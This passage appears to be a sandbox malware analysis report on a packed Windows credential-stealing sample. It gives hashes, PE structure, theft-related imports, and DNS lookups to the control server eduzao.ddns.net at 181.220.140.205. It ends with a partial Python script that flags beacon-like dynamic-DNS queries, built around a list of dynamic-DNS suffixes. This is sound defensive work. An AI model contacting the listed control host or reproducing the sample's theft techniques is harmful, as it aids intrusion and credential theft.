                                  Preview: 23:55:3000:25:4000:25:4000:25:4000:55:4001:25:4001:25:4001:25:4001:25:4001:55:4001:55:4001:55:4001:55:4002:25:4002:25:4002:25:4002:55:4002:55:4002:55:4003:25:4003:25:4003:25:4003:55:4003:55:4003:55:4004:25:4004:25:4004:25:4004:55:4004:55:4004:55:4005:25:4005:25:4005:25:4005:25:4005:55:4005:55:4006:25:4006:25:4006:25:4006:25:4006:55:4006:55:4006:55:4007:25:4007:25:4007:55:4007:55:4007:55:4008:25:4008:25:4008:25:4008:55:4008:55:4008:55:4009:25:4009:25:4009:25:4009:25:4009:55:4009:55:4010:25:4010:25:4010:25:4010:25:4010:55:4010:55:4010:55:4011:25:4011:25:4011:55:4011:55:4011:55:4011:55:4012:25:4012:25:4012:25:4012:55:4012:55:4013:25:4013:25:4013:25:4013:55:4013:55:4013:55:4013:55:4014:25:4014:25:4014:25:4014:55:4014:55:4014:55:4015:25:4015:25:4015:25:4015:55:4015:55:4015:55:4016:25:4016:25:4016:25:4016:55:4016:55:4016:55:4016:55:4017:25:4017:25:4017:25:4017:55:4017:55:4017:55:4017:55:4018:25:4018:25:4018:25:4018:55:4018:55:4018:55:4018:55:4019:25:4019:25:4019:25:4019:25:4019:55:4019:55:40
                                  C:\Users\user\AppData\Roaming\logs.dat
                                  Process:C:\Windows\SysWOW64\explorer.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):15
                                  Entropy (8bit):3.2402239289418517
                                  Encrypted:false
                                  SSDEEP:3:WhqgGRn:W4gg
                                  MD5:E21BD9604EFE8EE9B59DC7605B927A2A
                                  SHA1:3240ECC5EE459214344A1BAAC5C2A74046491104
                                  SHA-256:51A3FE220229AA3FDDDC909E20A4B107E7497320A00792A280A03389F2EACB46
                                  SHA-512:42052AD5744AD76494BFA71D78578E545A3B39BFED4C4232592987BD28064B6366A423084F1193D137493C9B13D9AE1FAAC4CF9CC75EB715542FA56E13CA1493
                                  Malicious:false
                                  Preview: ufDQcGGKk..####
                                  C:\Windows\install\TEXTURAFIVEM.exe
                                  Process:C:\Users\user\Desktop\dqH3t8JU1x.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Category:dropped
                                  Size (bytes):282624
                                  Entropy (8bit):7.750298138077895
                                  Encrypted:false
                                  SSDEEP:6144:+k4qmj9BDz1CcpraDKAobj6rSnMtpl4V1h9VC+1aMnKEw+2:h9+zEVDKomcX4V1h4Mnk+
                                  MD5:06E21AF52A3E3E5173A6A53725B1C217
                                  SHA1:273760EA9B8CF2B4E60E48ED7EA96AB92BB3FA1D
                                  SHA-256:61C2D5A213F1B68EF98F2800F02697650CCF28EB38EC07635F0BFFCDF18A803A
                                  SHA-512:45728DF9B579889C9BBD53C2E90BFFDB1A4131052FEBEAFF7C54DC134D62D5217243C191B89F61CDB1425A86ABAE3F5D9AA60F70D2757907F1D112073AA1F0D4
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 100%
                                  Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................@...........\... ...`....@..........................p...................@...........................k..t....`.......................................................]......................................................UPX0....................................UPX1.....@... ...>..................@....rsrc........`.......B..............@..............................................................................................................................................................................................................................................................................................................................................................................3.00.UPX!....
                                  C:\Windows\install\TEXTURAFIVEM.exe:Zone.Identifier
                                  Process:C:\Users\user\Desktop\dqH3t8JU1x.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview: [ZoneTransfer]....ZoneId=0

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Entropy (8bit):7.750298138077895
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.37%
                                  • UPX compressed Win32 Executable (30571/9) 0.30%
                                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  File name:dqH3t8JU1x.exe
                                  File size:282624
                                  MD5:06e21af52a3e3e5173a6a53725b1c217
                                  SHA1:273760ea9b8cf2b4e60e48ed7ea96ab92bb3fa1d
                                  SHA256:61c2d5a213f1b68ef98f2800f02697650ccf28eb38ec07635f0bffcdf18a803a
                                  SHA512:45728df9b579889c9bbd53c2e90bffdb1a4131052febeaff7c54dc134d62d5217243c191b89f61cdb1425a86abae3f5d9aa60f70d2757907f1d112073aa1f0d4
                                  SSDEEP:6144:+k4qmj9BDz1CcpraDKAobj6rSnMtpl4V1h9VC+1aMnKEw+2:h9+zEVDKomcX4V1h4Mnk+
                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                  File Icon

                                  Icon Hash:f4f4d2d2f6e6ccd4

                                  Static PE Info

                                  General

                                  Entrypoint:0x455c10
                                  Entrypoint Section:UPX1
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
                                  DLL Characteristics:
                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:cba5bd52b3e624400ffe41eb22644b79

                                  Entrypoint Preview

                                  Instruction
                                  pushad
                                  mov esi, 00412000h
                                  lea edi, dword ptr [esi-00011000h]
                                  push edi
                                  or ebp, FFFFFFFFh
                                  jmp 00007FFA388FAFA2h
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  mov al, byte ptr [esi]
                                  inc esi
                                  mov byte ptr [edi], al
                                  inc edi
                                  add ebx, ebx
                                  jne 00007FFA388FAF99h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007FFA388FAF7Fh
                                  mov eax, 00000001h
                                  add ebx, ebx
                                  jne 00007FFA388FAF99h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc eax, eax
                                  add ebx, ebx
                                  jnc 00007FFA388FAF9Dh
                                  jne 00007FFA388FAFBAh
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007FFA388FAFB1h
                                  dec eax
                                  add ebx, ebx
                                  jne 00007FFA388FAF99h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc eax, eax
                                  jmp 00007FFA388FAF66h
                                  add ebx, ebx
                                  jne 00007FFA388FAF99h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc ecx, ecx
                                  jmp 00007FFA388FAFE4h
                                  xor ecx, ecx
                                  sub eax, 03h
                                  jc 00007FFA388FAFA3h
                                  shl eax, 08h
                                  mov al, byte ptr [esi]
                                  inc esi
                                  xor eax, FFFFFFFFh
                                  je 00007FFA388FB007h
                                  sar eax, 1
                                  mov ebp, eax
                                  jmp 00007FFA388FAF9Dh
                                  add ebx, ebx
                                  jne 00007FFA388FAF99h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007FFA388FAF5Eh
                                  inc ecx
                                  add ebx, ebx
                                  jne 00007FFA388FAF99h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007FFA388FAF50h
                                  add ebx, ebx
                                  jne 00007FFA388FAF99h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc ecx, ecx
                                  add ebx, ebx
                                  jnc 00007FFA388FAF81h
                                  jne 00007FFA388FAF9Bh
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jnc 00007FFA388FAF76h
                                  add ecx, 02h
                                  cmp ebp, FFFFFB00h
                                  adc ecx, 02h
                                  lea edx, dword ptr [eax+eax]

                                  Data Directories

                                  Name | Virtual Address | Virtual Size | Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x56b08 | 0x274 | .rsrc
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x56000 | 0xb08 | .rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x55dc0 | 0x18 | UPX1
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                  Sections

                                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                  UPX0 | 0x1000 | 0x11000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  UPX1 | 0x12000 | 0x44000 | 0x43e00 | False | 0.97196204535 | data | 7.75361695117 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                  .rsrc | 0x56000 | 0x1000 | 0xe00 | False | 0.551897321429 | data | 5.57321541531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                  Resources

                                  Name | RVA | Size | Type | Language | Country
                                  RT_ICON | 0x14244 | 0x8a8 | SVR2 pure executable (Amdahl-UTS) not stripped - version 428919424 | |
                                  RT_ICON | 0x14aec | 0x8a8 | data | |
                                  RT_ICON | 0x56248 | 0x8a8 | data | |
                                  RT_RCDATA | 0x15c3c | 0x10 | data | |
                                  RT_RCDATA | 0x15c4c | 0x184 | data | |
                                  RT_RCDATA | 0x15dd0 | 0x39776 | data | |
                                  RT_GROUP_ICON | 0x56af4 | 0x14 | data | |
                                  RT_GROUP_ICON | 0x4f55c | 0x14 | data | |

                                  Imports

                                  DLL | Import
                                  KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                  advapi32.dll | LsaClose
                                  crypt32.dll | CryptUnprotectData
                                  ole32.dll | CoTaskMemFree
                                  oleaut32.dll | SysFreeString
                                  pstorec.dll | PStoreCreateInstance
                                  rasapi32.dll | RasEnumEntriesA
                                  shell32.dll | SHGetSpecialFolderPathA
                                  user32.dll | ToAscii

                                  Network Behavior

                                  Snort IDS Alerts

                                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                  04/15/21-23:53:59.096385 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.232
                                  04/15/21-23:53:59.132632 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 84.17.52.126 | 192.168.2.6
                                  04/15/21-23:53:59.136851 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.232
                                  04/15/21-23:53:59.172562 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 149.11.89.129 | 192.168.2.6
                                  04/15/21-23:53:59.173682 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.232
                                  04/15/21-23:53:59.209711 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 130.117.50.25 | 192.168.2.6
                                  04/15/21-23:53:59.210114 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.232
                                  04/15/21-23:53:59.251240 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 130.117.0.62 | 192.168.2.6
                                  04/15/21-23:53:59.251899 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.232
                                  04/15/21-23:53:59.298693 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 154.54.36.253 | 192.168.2.6
                                  04/15/21-23:53:59.300326 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.232
                                  04/15/21-23:53:59.346649 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 130.117.14.78 | 192.168.2.6
                                  04/15/21-23:53:59.347405 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.232
                                  04/15/21-23:53:59.409081 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 195.22.208.117 | 192.168.2.6
                                  04/15/21-23:53:59.411007 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.232
                                  04/15/21-23:53:59.464244 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 93.186.128.39 | 192.168.2.6
                                  04/15/21-23:53:59.464946 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.232
                                  04/15/21-23:53:59.519363 | ICMP | 408 | ICMP Echo Reply | | | 2.23.155.232 | 192.168.2.6

                                  Network Port Distribution

                                  UDP Packets

                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Apr 15, 2021 23:53:57.356012106 CEST | 63791 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:53:57.404707909 CEST | 53 | 63791 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:53:57.974400043 CEST | 64267 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:53:58.022939920 CEST | 53 | 64267 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:53:58.523369074 CEST | 49448 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:53:58.581073999 CEST | 53 | 49448 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:53:58.969647884 CEST | 60342 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:53:59.071053028 CEST | 53 | 60342 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:00.037657976 CEST | 61346 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:00.089605093 CEST | 53 | 61346 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:01.892913103 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:01.941695929 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:03.003626108 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:03.062793016 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:04.283185959 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:04.334734917 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:05.199903965 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:05.252921104 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:06.344018936 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:06.394470930 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:09.476833105 CEST | 58336 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:09.525525093 CEST | 53 | 58336 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:10.995256901 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:11.045006990 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:12.117697001 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:12.174906969 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:13.047930956 CEST | 52811 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:13.100862980 CEST | 53 | 52811 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:14.821696997 CEST | 55299 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:14.873748064 CEST | 53 | 55299 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:15.758128881 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:15.809355021 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:16.697487116 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:16.747389078 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:17.917047977 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:17.974220991 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:18.920409918 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:18.969341040 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:19.716342926 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:19.764926910 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:32.457685947 CEST | 49694 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:32.514893055 CEST | 53 | 49694 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:37.805726051 CEST | 54982 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:37.866144896 CEST | 53 | 54982 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:52.701009035 CEST | 50010 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:52.765266895 CEST | 53 | 50010 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:53.760749102 CEST | 63718 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:53.811330080 CEST | 53 | 63718 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:55.754363060 CEST | 62116 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:55.868745089 CEST | 53 | 62116 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:56.407974958 CEST | 63816 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:56.465255022 CEST | 53 | 63816 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:57.068628073 CEST | 55014 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:57.125652075 CEST | 53 | 55014 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:57.185837030 CEST | 62208 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:57.261985064 CEST | 53 | 62208 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:57.818519115 CEST | 57574 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:57.875533104 CEST | 53 | 57574 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:58.416580915 CEST | 51818 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:58.473583937 CEST | 53 | 51818 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:54:59.279212952 CEST | 56628 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:54:59.331255913 CEST | 53 | 56628 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:55:00.632286072 CEST | 60778 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:55:00.689613104 CEST | 53 | 60778 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:55:01.700973988 CEST | 53799 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:55:01.760900974 CEST | 53 | 53799 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:55:02.638097048 CEST | 54683 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:55:02.697885036 CEST | 53 | 54683 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:55:03.337359905 CEST | 59329 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:55:03.386181116 CEST | 53 | 59329 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:55:03.942244053 CEST | 64021 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:55:04.003590107 CEST | 53 | 64021 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:55:31.699481964 CEST | 56129 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:55:31.760138035 CEST | 53 | 56129 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:55:44.600035906 CEST | 58177 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:55:44.656975985 CEST | 53 | 58177 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:55:50.481057882 CEST | 50700 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:55:50.529961109 CEST | 53 | 50700 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:56:01.266410112 CEST | 54069 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:56:01.323438883 CEST | 53 | 54069 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:56:06.435883045 CEST | 61178 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:56:06.486165047 CEST | 53 | 61178 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:56:09.279042959 CEST | 57017 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:56:09.336168051 CEST | 53 | 57017 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:56:15.060127020 CEST | 56327 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:56:15.119329929 CEST | 53 | 56327 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:56:22.432969093 CEST | 50243 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:56:22.578448057 CEST | 53 | 50243 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:56:30.548095942 CEST | 62055 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:56:30.607217073 CEST | 53 | 62055 | 8.8.8.8 | 192.168.2.6
                                  Apr 15, 2021 23:56:37.574990034 CEST | 61249 | 53 | 192.168.2.6 | 8.8.8.8
                                  Apr 15, 2021 23:56:37.632180929 CEST | 53 | 61249 | 8.8.8.8 | 192.168.2.6

                                  DNS Queries

                                  Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name             Type            Class
                                  Apr 15, 2021 23:56:15.060127020 CEST  192.168.2.6  8.8.8.8  0xdb05    Standard query (0)  eduzao.ddns.net  A (IP address)  IN (0x0001)
                                  Apr 15, 2021 23:56:22.432969093 CEST  192.168.2.6  8.8.8.8  0x101a    Standard query (0)  eduzao.ddns.net  A (IP address)  IN (0x0001)
                                  Apr 15, 2021 23:56:30.548095942 CEST  192.168.2.6  8.8.8.8  0x430e    Standard query (0)  eduzao.ddns.net  A (IP address)  IN (0x0001)
                                  Apr 15, 2021 23:56:37.574990034 CEST  192.168.2.6  8.8.8.8  0x22f7    Standard query (0)  eduzao.ddns.net  A (IP address)  IN (0x0001)

                                  DNS Answers

                                  Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name             CName  Address          Type            Class
                                  Apr 15, 2021 23:56:15.119329929 CEST  8.8.8.8    192.168.2.6  0xdb05    No error (0)  eduzao.ddns.net  -      181.220.140.205  A (IP address)  IN (0x0001)
                                  Apr 15, 2021 23:56:22.578448057 CEST  8.8.8.8    192.168.2.6  0x101a    No error (0)  eduzao.ddns.net  -      181.220.140.205  A (IP address)  IN (0x0001)
                                  Apr 15, 2021 23:56:30.607217073 CEST  8.8.8.8    192.168.2.6  0x430e    No error (0)  eduzao.ddns.net  -      181.220.140.205  A (IP address)  IN (0x0001)
                                  Apr 15, 2021 23:56:37.632180929 CEST  8.8.8.8    192.168.2.6  0x22f7    No error (0)  eduzao.ddns.net  -      181.220.140.205  A (IP address)  IN (0x0001)
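                                  The four lookups above are the sample's C2 resolution: the same dynamic-DNS name, roughly every seven seconds, always answered with 181.220.140.205. The script below is an added example, not Joe Sandbox code, showing how a detection engineer would turn that pattern into a rule over a DNS query log. The one-record-per-line log format, the sample records (the report's four queries plus one benign lookup) and the dynamic-DNS suffix list are all constructed for the example.

```python
"""Spot periodic lookups of dynamic-DNS hosts in a DNS query log.

Added example (not Joe Sandbox code). The log format below is constructed:
"<date> <time> <client> query <name> <type> <answer>", one record per line.
"""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Illustrative list of free dynamic-DNS suffixes often used for RAT C2
# (assumption; extend from your own threat intel).
DDNS_SUFFIXES = (".ddns.net", ".no-ip.org", ".no-ip.biz", ".hopto.org", ".zapto.org", ".duckdns.org")

# Constructed sample: one benign lookup plus the four eduzao.ddns.net queries
# from the report above (same timestamps to the microsecond, same answer).
SAMPLE_LOG = """\
2021-04-15 23:55:03.337359 192.168.2.6 query example.com A 93.184.216.34
2021-04-15 23:56:15.060127 192.168.2.6 query eduzao.ddns.net A 181.220.140.205
2021-04-15 23:56:22.432969 192.168.2.6 query eduzao.ddns.net A 181.220.140.205
2021-04-15 23:56:30.548095 192.168.2.6 query eduzao.ddns.net A 181.220.140.205
2021-04-15 23:56:37.574990 192.168.2.6 query eduzao.ddns.net A 181.220.140.205
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) (?P<src>\S+) query "
    r"(?P<name>\S+) (?P<qtype>\S+) (?P<answer>\S+)$"
)


def parse_log(text: str) -> list[dict]:
    """Turn log lines into records; malformed lines are skipped, not fatal."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S.%f")
        records.append(rec)
    return records


def is_ddns(name: str) -> bool:
    """True when the queried name sits under a known dynamic-DNS provider."""
    return name.lower().rstrip(".").endswith(DDNS_SUFFIXES)


def find_beacons(records: list[dict], min_queries: int = 3, max_cv: float = 0.3) -> list[dict]:
    """Group queries per (client, name) and flag regular, low-jitter lookups.

    Beacon-like traffic has near-constant gaps between queries, so the
    coefficient of variation (stdev / mean) of those gaps stays small.
    """
    by_key: dict[tuple[str, str], list[dict]] = defaultdict(list)
    for rec in records:
        by_key[(rec["src"], rec["name"])].append(rec)

    findings = []
    for (src, name), recs in by_key.items():
        if len(recs) < min_queries:
            continue
        recs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(recs, recs[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv > max_cv:
            continue
        findings.append({
            "src": src,
            "name": name,
            "ddns": is_ddns(name),
            "queries": len(recs),
            "mean_interval_s": round(avg, 3),
            "jitter_cv": round(cv, 3),
            "answers": sorted({r["answer"] for r in recs}),
        })
    return findings


if __name__ == "__main__":
    for f in find_beacons(parse_log(SAMPLE_LOG)):
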